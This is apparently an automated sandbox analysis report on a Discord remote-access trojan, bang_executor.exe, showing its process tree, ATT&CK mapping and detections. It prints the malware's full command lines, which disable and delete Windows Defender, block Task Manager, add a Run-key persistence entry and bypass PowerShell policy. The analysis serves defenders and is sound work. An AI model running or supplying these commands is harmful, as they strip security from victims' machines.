Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe bang_executor.exe
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe executer.exe
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K instaling.bat
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K mgr.bat
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K microsoft.bat
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ep bypass .\test.ps1;
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c echo add-mppreference -exclusionpath "c:\" -erroraction silentlycontinue; add-mppreference -exclusionprocess "c:\*" -erroraction silentlycontinue; set-mppreference -disablearchivescanning 1 -erroraction silentlycontinue; set-mppreference -disablebehaviormonitoring 1 -erroraction silentlycontinue; set-mppreference -disableintrusionpreventionsystem 1 -erroraction silentlycontinue; set-mppreference -disableioavprotection 1 -erroraction silentlycontinue; set-mppreference -disableremovabledrivescanning 1 -erroraction silentlycontinue; set-mppreference -disableblockatfirstseen 1 -erroraction silentlycontinue; set-mppreference -disablescanningmappednetworkdrivesforfullscan 1 -erroraction silentlycontinue; set-mppreference -disablescanningnetworkfiles 1 -erroraction silentlycontinue; set-mppreference -disablescriptscanning 1 -erroraction silentlycontinue; set-mppreference -disablerealtimemonitoring 1 -erroraction silentlycontinue; set-mppreference -lowthreatdefaultaction allow -erroraction silentlycontinue; set-mppreference -moderatethreatdefaultaction allow -erroraction silentlycontinue; set-mppreference -highthreatdefaultaction allow -erroraction silentlycontinue; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdnissvc" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\windefend" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\sense" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdnisdrv" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdfilter" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdboot" -name start -value 4; set-itemproperty -path "hklm:\software\microsoft\windows defender\real-time protection" -name spynetreporting -value 0; set-itemproperty -path "hklm:\software\microsoft\windows defender\real-time protection" -name submitsamplesconsent -value 0; set-itemproperty -path "hklm:\software\microsoft\windows defender\features" -name tamperprotection -value 4; set-itemproperty -path "hklm:\software\microsoft\windows defender" -name disableantispyware -value 1; set-itemproperty -path "hklm:\software\policies\microsoft\windows defender" -name disableantispyware -value 1; remove-item -recurse -force -path "c:\programdata\windows\windows defender\"; remove-item -recurse -force -path "c:\programdata\windows\windows defender advanced threat protection\"; remove-item -recurse -force -path "c:\windows\system32\drivers\wd\"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\wdnissvc"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\windefend"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\sense"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\wdnisdrv"; remove-item -recurse -force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c echo add-mppreference -exclusionpath "c:\" -erroraction silentlycontinue; add-mppreference -exclusionprocess "c:\*" -erroraction silentlycontinue; set-mppreference -disablearchivescanning 1 -erroraction silentlycontinue; set-mppreference -disablebehaviormonitoring 1 -erroraction silentlycontinue; set-mppreference -disableintrusionpreventionsystem 1 -erroraction silentlycontinue; set-mppreference -disableioavprotection 1 -erroraction silentlycontinue; set-mppreference -disableremovabledrivescanning 1 -erroraction silentlycontinue; set-mppreference -disableblockatfirstseen 1 -erroraction silentlycontinue; set-mppreference -disablescanningmappednetworkdrivesforfullscan 1 -erroraction silentlycontinue; set-mppreference -disablescanningnetworkfiles 1 -erroraction silentlycontinue; set-mppreference -disablescriptscanning 1 -erroraction silentlycontinue; set-mppreference -disablerealtimemonitoring 1 -erroraction silentlycontinue; set-mppreference -lowthreatdefaultaction allow -erroraction silentlycontinue; set-mppreference -moderatethreatdefaultaction allow -erroraction silentlycontinue; set-mppreference -highthreatdefaultaction allow -erroraction silentlycontinue; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdnissvc" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\windefend" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\sense" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdnisdrv" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdfilter" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdboot" -name start -value 4; set-itemproperty -path "hklm:\software\microsoft\windows defender\real-time protection" -name 
spynetreporting -value 0; set-itemproperty -path "hklm:\software\microsoft\windows defender\real-time protection" -name submitsamplesconsent -value 0; set-itemproperty -path "hklm:\software\microsoft\windows defender\features" -name tamperprotection -value 4; set-itemproperty -path "hklm:\software\microsoft\windows defender" -name disableantispyware -value 1; set-itemproperty -path "hklm:\software\policies\microsoft\windows defender" -name disableantispyware -value 1; remove-item -recurse -force -path "c:\programdata\windows\windows defender\"; remove-item -recurse -force -path "c:\programdata\windows\windows defender advanced threat protection\"; remove-item -recurse -force -path "c:\windows\system32\drivers\wd\"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\wdnissvc"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\windefend"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\sense"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\wdnisdrv"; remove-item -recurse -force -
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004FCEBF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,0_2_004FCEBF
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F27A9 cpuid 0_2_004F27A9
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_004FD0AB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050037C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004ED076 GetVersionExW,0_2_004ED076
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: bang_executor.exe.0.dr, Program.cs .Net Code: DisableTaskManager
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1
          Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
          Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: MsMpEng.exe
          Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara matchFile source: 3.0.bang_executor.exe.230771e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: bang_executor.exe PID: 1236, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, type: DROPPED

          Remote Access Functionality

          Source: Yara matchFile source: 3.0.bang_executor.exe.230771e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: bang_executor.exe PID: 1236, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, type: DROPPED

          MITRE ATT&CK Matrix (listed per tactic; numeric prefixes are kept as rendered in the original matrix and mark the techniques the analysis flagged)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
          Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
          Execution: 1 Windows Management Instrumentation; 2 Native API; 212 Command and Scripting Interpreter; 1 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
          Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
          Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
          Defense Evasion: 71 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 11 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 1 Masquerading; 1 Modify Registry; 41 Virtualization/Sandbox Evasion; 11 Process Injection
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
          Discovery: 1 System Time Discovery; 2 File and Directory Discovery; 36 System Information Discovery; 1 Query Registry; 151 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
          Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
          Command and Control: 3 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
          Behavior Graph

          Behavior Graph ID: 1393035  Sample: bang_executor.exe  Start date: 15/02/2024  Architecture: WINDOWS  Score: 100

          Signatures attached to the start node: Antivirus detection for URL or domain; Yara detected Dicrord Rat; .NET source code contains potential unpacker; 6 other signatures.
          Network: gateway.discord.gg (162.159.136.234, port 443, local ports 49729 and 49730; CLOUDFLARENETUS, United States), contacted from the group of three other processes spawned by the first cmd.exe.

          Process tree (bracketed text lists the signatures the graph attaches to that process):

          bang_executor.exe (15 files created)
            dropped: C:\Users\user\AppData\Local\...\executer.exe (PE32)
            dropped: C:\Users\user\AppData\...\bang_executor.exe (PE32+)
            cmd.exe [Uses cmd line tools excessively to alter registry or file data]
              executer.exe [Multi AV Scanner detection for dropped file; Very long command line found; Machine Learning detection for dropped file; 4 other signatures]
                cmd.exe [Bypasses PowerShell execution policy]
                  conhost.exe
                cmd.exe
                  powershell.exe
                    WmiPrvSE.exe
                  conhost.exe
                  conhost.exe
                conhost.exe
              cmd.exe [Uses cmd line tools excessively to alter registry or file data]
                reg.exe [Disable Task Manager(disabletaskmgr); Disables the Windows task manager (taskmgr)]
                conhost.exe
              cmd.exe
                reg.exe
                  bang_executor.exe
                    WerFault.exe
                2 other processes
